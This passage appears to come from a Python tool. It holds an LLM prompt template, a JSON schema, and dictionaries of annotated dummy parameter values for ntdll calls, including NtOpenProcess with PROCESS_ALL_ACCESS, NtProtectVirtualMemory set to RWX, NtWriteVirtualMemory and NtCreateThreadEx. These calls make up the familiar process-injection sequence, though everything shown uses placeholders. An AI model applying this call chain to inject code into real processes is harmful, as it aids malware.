entries.\r\n - Each entry represents one ntdll-export call and its pushed parameters.\r\n\r\n- structures\r\n - A top-level array of expanded structure definitions.\r\n - Each structure definition must include an \"id\" such as \"struct1\", \"struct2\", or \"struct3\".\r\n - Those \"id\" values are referenced by structureRef inside pushes.\r\n - Note: after parsing, my tool will convert this list into my canonical dict form: { \"struct1\": { ... } }.\r\n\r\nEach object in calls must contain exactly these fields:\r\n\r\n\r\n- ntFunc\r\n - The name of the ntdll-export function associated with this group of pushes.\r\n - Examples:\r\n - \"NtProtectVirtualMemory\"\r\n - \"NtCreateSection\"\r\n - \"NtOpenProcess\"\r\n\r\n- pushes\r\n - The pushed parameters for that function call.\r\n - Preserve the exact push order as written in the input assembly.\r\n\r\nEach object in pushes must contain exactly these fields:\r\n\r\n- value\r\n - The pushed immediate, formatted as a hexadecimal string.\r\n - Use the raw value, not a symbolic constant name.\r\n - Example: \"0x00000040\"\r\n - For pointer-like placeholders, use an obvious dummy hexadecimal value and note that it is a dummy value.\r\n - For handle-like placeholders, use an obvious dummy hexadecimal value and note that it is a dummy value.\r\n - If a default value is appropriate, it may be used. \r\n\r\n- additionalComment\r\n - A human-readable comment that could be appended to the original assembly comment with relevant details.\r\n - Include a symbolic constant name if applicable, but do not replace the raw hexadecimal value.\r\n - Examples: \"NULL\", \"MEM_COMMIT\", \"Pointer to OBJECT_ATTRIBUTES\"\r\n - If a value is a default or dummy value, say so here.\r\n\r\n- structurePointer\r\n - If the value is a pointer to a structure, return the structure type name; otherwise return null.\r\n - Examples: \"OBJECT_ATTRIBUTES\", \"CLIENT_ID\", \"LARGE_INTEGER\"\r\n\r\n- structureRef\r\n - If the pushed value is a pointer to a structure, return the id of the matching structure definition in the top-level structures array”\r\n - Otherwise return null.\r\n - Examples:\r\n - \"struct1\"\r\n - \"struct2\"\r\n\r\n- structureValueExpectations\r\n - Short text describing the kinds of values expected inside that structure for this parameter, otherwise null.\r\n- pointedValue\r\n - If the pushed immediate represents a pointer to a non-structure value, provide the value stored at that pointed-to location.\r\n - Format it as a hexadecimal string when appropriate.\r\n - Examples:\r\n - \"0x00001000\" for a pointed-to ULONG\r\n - \"0x10000000\" for a pointed-to base address\r\n - If the pushed value is a pointer to a structure, return null.\r\n - If the pushed value is not being used as a pointer, return null.\r\n\r\nEach object in structures must contain exactly these fields:\r\n- id\r\n- type\r\n - The structure type name.\r\n - Examples:\r\n - \"OBJECT_ATTRIBUTES\"\r\n - \"CLIENT_ID\"\r\n - \"LARGE_INTEGER\"\r\n - \"UNICODE_STRING\"\r\n\r\n- fields\r\n - An array of field definitions for the structure.\r\n\r\nEach object in fields must contain exactly these fields:\r\n\r\n- fieldName\r\n - The field name within the structure.\r\n\r\n- fieldType\r\n - The type of the field.\r\n\r\n- fieldValue\r\n - A sample value for the field.\r\n - Format it as a hexadecimal string when appropriate.\r\n\r\n- fieldComment\r\n - A short human-readable explanation of the field value.\r\n\r\n\r\nRules\r\n- Preserve push order exactly as written.\r\n- value must always be a hexadecimal string.\r\n- Do not output decimal values.\r\n- Do not replace value with symbolic names.\r\n- Use additionalComment for human-readable meaning.\r\n- Use structurePointer only when the immediate value is being used as a pointer to a structure type.\r\n- Use structureValueExpectations only when structurePointer is not null.\r\n- Use pointedValue only for pointers to non-structure values.\r\n- If structurePointer is not null, pointedValue must be null.\r\n- Do not duplicate full structure field definitions inside pushes.\r\n- Put expanded structure definitions only in the top-level structures array and reference them by structureRef.\r\n- Output JSON only.\r\n- For ANY pointer address, push or struc, please use some variant of 0xbadd0000, e.g. 0xbadd0010, etc. increment it. Why? We don't know the address. - label any pointers as dummy pointers in comments.\r\n\r\nHard pointer rules\r\n- If the parameter type begins with \"P\", contains \"*\", or is a known pointer form such as PHANDLE, PULONG, PVOID, PVOID*, PLARGE_INTEGER, POBJECT_ATTRIBUTES, PCLIENT_ID, or PUNICODE_STRING, then the pushed value must be a dummy pointer such as 0xbadd0000, 0xbadd0010, etc., unless the example is explicitly intended to be NULL.\r\n- If such a pointer parameter is represented as NULL, additionalComment must explicitly say NULL or default NULL.\r\n- Pointer parameters must not be emitted as direct scalar values unless they are explicitly NULL.\r\n- PHANDLE is a pointer, not a direct handle value.\r\n- PLARGE_INTEGER is a pointer, not a direct scalar value.\r\n- POBJECT_ATTRIBUTES is a pointer, not a direct scalar value.\r\n- ACCESS_MASK / DesiredAccess should usually be nonzero unless the example truly intends a default or failure-style case.\r\n\r\nBefore finalizing the JSON, perform these checks:\r\n- Every parameter whose type syntactically indicates a pointer must use either a dummy pointer value or an explicitly documented NULL.\r\n- Every non-null structure pointer must have structurePointer and structureRef populated.\r\n- pointedValue must only be used for pointers to non-structure values.\r\n- ACCESS_MASK / DesiredAccess must not be zero unless explicitly justified in additionalComment.\r\n- Do not let the final calls in the batch degrade into repeated zero/default placeholders.\r\n\r\nUse realistic default values when they are common in real-world usage.\r\n\r\nUse NULL/default values only when they are genuinely realistic for that exact parameter in a normal illustrative example. Do not use NULL/default values merely because the input placeholder is zero.\r\n\r\nFor parameters that are central to understanding the call, or commonly populated in real-world usage, prefer realistic non-NULL illustrative values.\r\n\r\nIf a structure pointer is NULL in a realistic example, it is acceptable for structurePointer, structureRef, and structureValueExpectations to be null.\r\nIf a structure is used, populate it realistically rather than overfilling optional fields.\r\nDo not invent strings, names, or nested pointer data unless they are plausibly useful for the example.\r\nFor OBJECT_ATTRIBUTES, it is acceptable and often realistic for ObjectName to be NULL.\r\nUse a dummy PUNICODE_STRING pointer only when a named object is actually helpful to the example.\r\n\r\nThese pushes prepare arguments for calling the ntdll export function NtProtectVirtualMemory via a normal function call, not a direct syscall. The assembly is setting up parameters for a stdcall-style call into an ntdll export. These assembly pushes prepare arguments for calling an exported function from ntdll using a normal user-mode call. The pushes simply represent function parameters. While you are not providing fully complete code fragments, this will help my students with their work.\r\n\r\nThis is a teaching exercise for understanding parameter interpretation.\r\n\r\n\r\nOutput exactly this top-level structure -- note some parameters have been truncated or removed for brevity -- all should be present in results.:\r\nUse this top-level shape:\r\n{\r\n \"calls\": [\r\n {\r\n \"ntFunc\": \"NtProtectVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG OldAccessProtection (dummy pointer)\",\r\n \"structurePointer\": null,\r\n \"structureRef\": null,\r\n \"structureValueExpectations\": null,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"PAGE_EXECUTE_READWRITE\",\r\n \"structurePointer\": null,\r\n \"structureRef\": null,\r\n \"structureValueExpectations\": null,\r\n \"pointedValue\": null\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG NumberOfBytesToProtect (dummy pointer)\",\r\n \"structurePointer\": null,\r\n \"structureRef\": null,\r\n \"structureValueExpectations\": null,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to PVOID BaseAddress (dummy pointer)\",\r\n \"structurePointer\": null,\r\n \"structureRef\": null,\r\n \"structureValueExpectations\": null,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": null,\r\n \"structureRef\": null,\r\n \"structureValueExpectations\": null,\r\n \"pointedValue\": null\r\n }\r\n ]\r\n },\r\n {\r\n \"ntFunc\": \"NtOpenProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to CLIENT_ID (dummy pointer)\",\r\n \"structurePointer\": \"CLIENT_ID\",\r\n \"structureRef\": \"struct1\",\r\n \"structureValueExpectations\": \"UniqueProcess and UniqueThread identifiers.\",\r\n \"pointedValue\": null\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct2\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": null\r\n },\r\n {\r\n \"value\": \"0x001F0FFF\",\r\n \"additionalComment\": \"DesiredAccess (PROCESS_ALL_ACCESS)\",\r\n \"structurePointer\": null,\r\n \"structureRef\": null,\r\n \"structureValueExpectations\": null,\r\n \"pointedValue\": null\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to HANDLE ProcessHandle (dummy pointer)\",\r\n \"structurePointer\": null,\r\n \"structureRef\": null,\r\n \"structureValueExpectations\": null,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ]\r\n }\r\n ],\r\n \"structures\": [\r\n {\r\n \"id\": \"struct1\",\r\n \"type\": \"CLIENT_ID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99994444\",\r\n \"fieldComment\": \"Dummy process identifier value\"\r\n },\r\n {\r\n \"fieldName\": \"UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"NULL or unused example value\"\r\n }\r\n ]\r\n },\r\n {\r\n \"id\": \"struct2\",\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"NULL\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"NULL (often omitted in realistic examples)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"NULL\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"NULL\"\r\n }\r\n ]\r\n }\r\n ]\r\n}\r\n\r\n\r\nImportant! The input immediates are placeholders only. Do not copy placeholder zero values across all entries.\r\nUse real-world, nonzero illustrative hexadecimal sample values where appropriate. Again, you MUST provide realistic, reasonable, real-world examples for our students!\r\n\"\"\"\r\nold=\"\"\"\r\nthis is for an ntdll user mode call [ntdll!NtProtectVirtualMemory] with RWX\r\npush 0x00000000 ; PULONG OldAccessProtection\r\npush 0x00000000 ; ULONG NewAccessProtection\r\npush 0x00000000 ; PULONG NumberOfBytesToProtect\r\npush 0x00000000 ; PVOID *BaseAddress\r\npush 0x00000000 ; HANDLE ProcessHandle\r\n\r\nthis is for an ntdll user mode call [ntdll!NtCreateSection] \r\n\r\npush 0x00000000 ; HANDLE FileHandle\r\npush 0x00000000 ; ULONG AllocationAttributes\r\npush 0x00000000 ; ULONG SectionPageProtection\r\npush 0x00000000 ; PLARGE_INTEGER MaximumSize\r\npush 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes\r\npush 0x00000000 ; ACCESS_MASK DesiredAccess\r\npush 0x00000000 ; PHANDLE SectionHandle\r\n\"\"\"\r\n\r\nschema = {\r\n \"name\": \"nt_call_list\",\r\n \"strict\": True,\r\n \"schema\": {\r\n \"type\": \"object\",\r\n \"properties\": {\r\n \"calls\": {\r\n \"type\": \"array\",\r\n \"items\": {\r\n \"type\": \"object\",\r\n \"properties\": {\r\n \"ntFunc\": {\"type\": \"string\"},\r\n \"pushes\": {\r\n \"type\": \"array\",\r\n \"items\": {\r\n \"type\": \"object\",\r\n \"properties\": {\r\n \"value\": {\"type\": \"string\"},\r\n \"additionalComment\": {\r\n \"anyOf\": [{\"type\": \"string\"}, {\"type\": \"null\"}]\r\n },\r\n \"structurePointer\": {\r\n \"anyOf\": [{\"type\": \"string\"}, {\"type\": \"null\"}]\r\n },\r\n \"structureRef\": {\r\n \"anyOf\": [{\"type\": \"string\"}, {\"type\": \"null\"}]\r\n },\r\n \"structureValueExpectations\": {\r\n \"anyOf\": [{\"type\": \"string\"}, {\"type\": \"null\"}]\r\n },\r\n \"pointedValue\": {\r\n \"anyOf\": [{\"type\": \"string\"}, {\"type\": \"null\"}]\r\n }\r\n },\r\n \"required\": [\r\n \"value\",\r\n \"additionalComment\",\r\n \"structurePointer\",\r\n \"structureRef\",\r\n \"structureValueExpectations\",\r\n \"pointedValue\"\r\n ],\r\n \"additionalProperties\": False\r\n }\r\n }\r\n },\r\n \"required\": [\"ntFunc\", \"pushes\"],\r\n \"additionalProperties\": False\r\n }\r\n },\r\n\r\n \"structures\": {\r\n \"type\": \"array\",\r\n \"items\": {\r\n \"type\": \"object\",\r\n \"properties\": {\r\n \"id\": {\"type\": \"string\"},\r\n \"type\": {\"type\": \"string\"},\r\n \"fields\": {\r\n \"type\": \"array\",\r\n \"items\": {\r\n \"type\": \"object\",\r\n \"properties\": {\r\n \"fieldName\": {\"type\": \"string\"},\r\n \"fieldType\": {\"type\": \"string\"},\r\n \"fieldValue\": {\"type\": \"string\"},\r\n \"fieldComment\": {\r\n \"anyOf\": [{\"type\": \"string\"}, {\"type\": \"null\"}]\r\n }\r\n },\r\n \"required\": [\r\n \"fieldName\",\r\n \"fieldType\",\r\n \"fieldValue\",\r\n \"fieldComment\"\r\n ],\r\n \"additionalProperties\": False\r\n }\r\n }\r\n },\r\n \"required\": [\"id\", \"type\", \"fields\"],\r\n \"additionalProperties\": False\r\n }\r\n }\r\n },\r\n \"required\": [\"calls\", \"structures\"],\r\n \"additionalProperties\": False\r\n }\r\n}\r\n\r\napi_blocks = [\r\n \"\"\"this is for an ntdll user mode call [ntdll!NtProtectVirtualMemory] with RWX\r\npush 0x00000000 ; PULONG OldAccessProtection\r\npush 0x00000000 ; ULONG NewAccessProtection\r\npush 0x00000000 ; PULONG NumberOfBytesToProtect\r\npush 0x00000000 ; PVOID *BaseAddress\r\npush 0x00000000 ; HANDLE ProcessHandle\r\n\r\nthis is for an ntdll user mode call [ntdll!NtWaitForSingleObject]\r\n\r\npush 0x00000000 ; PLARGE_INTEGER TimeOut\r\npush 0x00000000 ; BOOLEAN Alertable\r\npush 0x00000000 ; HANDLE ObjectHandle\r\n\r\n\r\nthis is for an ntdll user mode call [ntdll!NtCreateThreadEx]\r\n\r\npush 0x00000000 ; PVOID AttributeList\r\npush 0x00000000 ; ULONG MaximumStackSize\r\npush 0x00000000 ; ULONG StackSize\r\npush 0x00000000 ; ULONG ZeroBits\r\npush 0x00000000 ; ULONG CreateFlags\r\npush 0x00000000 ; PVOID Argument\r\npush 0x00000000 ; PVOID StartR__OUTine\r\npush 0x00000000 ; HANDLE ProcessHandle\r\npush 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes\r\npush 0x00000000 ; ACCESS_MASK DesiredAccess\r\npush 0x00000000 ; PHANDLE ThreadHandle\r\n this is for an ntdll user mode call [ntdll!NtCreateSection]\r\npush 0x00000000 ; HANDLE FileHandle\r\npush 0x00000000 ; ULONG AllocationAttributes\r\npush 0x00000000 ; ULONG SectionPageProtection\r\npush 0x00000000 ; PLARGE_INTEGER MaximumSize\r\npush 0x00000000 ; POBJECT_ATTRIBUTES ObjectAttributes\r\npush 0x00000000 ; ACCESS_MASK DesiredAccess\r\npush 0x00000000 ; PHANDLE SectionHandle\r\n\r\n\r\nthis is for an ntdll user mode call [ntdll!NtWriteVirtualMemory] \r\n\r\npush 0x00000000 ; PULONG NumberOfBytesWritten\r\npush 0x00000000 ; ULONG NumberOfBytesToWrite\r\npush 0x00000000 ; PVOID Buffer\r\npush 0x00000000 ; PVOID BaseAddress\r\npush 0x00000000 ; HANDLE ProcessHandle\r\n\r\nthis is for an ntdll user mode call [ntdll!NtProtectVirtualMemory] with RWX\r\n\r\npush 0x00000000 ; PULONG OldAccessProtection\r\npush 0x00000000 ; ULONG NewAccessProtection\r\npush 0x00000000 ; PULONG NumberOfBytesToProtect\r\npush 0x00000000 ; PVOID *BaseAddress\r\npush 0x00000000 ; HANDLE ProcessHandle\r\n\r\nthis is for an ntdll user mode call [ntdll!NtQuerySystemInformation] X\r\n\r\npush 0x00000000 ; PULONG ReturnLength\r\npush 0x00000000 ; ULONG SystemInformationLength\r\npush 0x00000000 ; PVOID SystemInformation\r\npush 0x00000000 ; SYSTEM_INFORMATION_CLASS SystemInformationClass\r\n\"\"\"\r\n\r\n \r\n]\r\n\r\n# print(schema[\"schema\"][\"properties\"].keys())\r\n# print(schema[\"schema\"][\"required\"])" }, { "path": "start/syscallPossibleValues.py", "content": "\r\nsyscallPossibleValues = {\r\n \"NtWorkerFactoryWorkerReady\": {\r\n \"ntFunc\": \"NtWorkerFactoryWorkerReady\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE WorkerFactoryHandle (None, typical for test or error path)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtMapUserPhysicalPagesScatter\": {\r\n \"ntFunc\": \"NtMapUserPhysicalPagesScatter\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PULONG_PTR UserPfnArray (None, no physical pages mapped)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG_PTR NumberOfPages (0, no pages to map)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID VirtualAddresses (None, no virtual addresses provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWaitForMultipleObjects32\": {\r\n \"ntFunc\": \"NtWaitForMultipleObjects32\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER Time_Out (None, wait indefinitely)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN Alertable (FALSE, not alertable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"WAIT_TYPE WaitType (WaitAll, default value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLONG Handles (None, no handles provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG ObjectCount (0, no objects to wait for)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReplyWaitReceivePortEx\": {\r\n \"ntFunc\": \"NtReplyWaitReceivePortEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PLARGE_INTEGER Time_Out (None, wait indefinitely)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PPORT_MESSAGE ReceiveMessage (None, no receive message buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PPORT_MESSAGE ReplyMessage (None, no reply message buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID PortContext (None, no port context)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE PortHandle (None, no port handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryDefaultUILanguage\": {\r\n \"ntFunc\": \"NtQueryDefaultUILanguage\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"LANGID DefaultUILanguageId (None, output parameter, will be filled by function)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtApphelpCacheControl\": {\r\n \"ntFunc\": \"NtApphelpCacheControl\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ServiceContext (no context provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"AHC_SERVICE_CLASS ServiceClass (e.g., ApphelpCheckExe)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateProcessEx\": {\r\n \"ntFunc\": \"NtCreateProcessEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN InJob (FALSE, not in job)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ExceptionPort (None, no exception port)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE DebugPort (None, no debug port)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"HANDLE SectionHandle (dummy handle, e.g., section for image)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN InheritObjectTable (TRUE, inherit handles)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ParentProcess (dummy handle, e.g., current process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct1\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0FFF\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (PROCESS_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE ProcessHandle (dummy pointer, receives new process handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct1\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtIsProcessInJob\": {\r\n \"ntFunc\": \"NtIsProcessInJob\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE JobHandle (None, current job)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, e.g., current process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAccessCheckByTypeAndAuditAlarm\": {\r\n \"ntFunc\": \"NtAccessCheckByTypeAndAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to BOOLEAN GenerateOnClose (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to NTSTATUS (dummy pointer, receives status)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ACCESS_MASK GrantedAccess (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN ObjectCreation (FALSE, not object creation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to GENERIC_MAPPING (dummy pointer)\",\r\n \"structurePointer\": \"GENERIC_MAPPING\",\r\n \"structureRef\": \"struct2\",\r\n \"structureValueExpectations\": \"GENERIC_READ/WRITE/EXECUTE/ALL mappings.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG ObjectTypeListLength (1 object type)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to OBJECT_TYPE_LIST (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_TYPE_LIST\",\r\n \"structureRef\": \"struct3\",\r\n \"structureValueExpectations\": \"Array of object type entries.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": 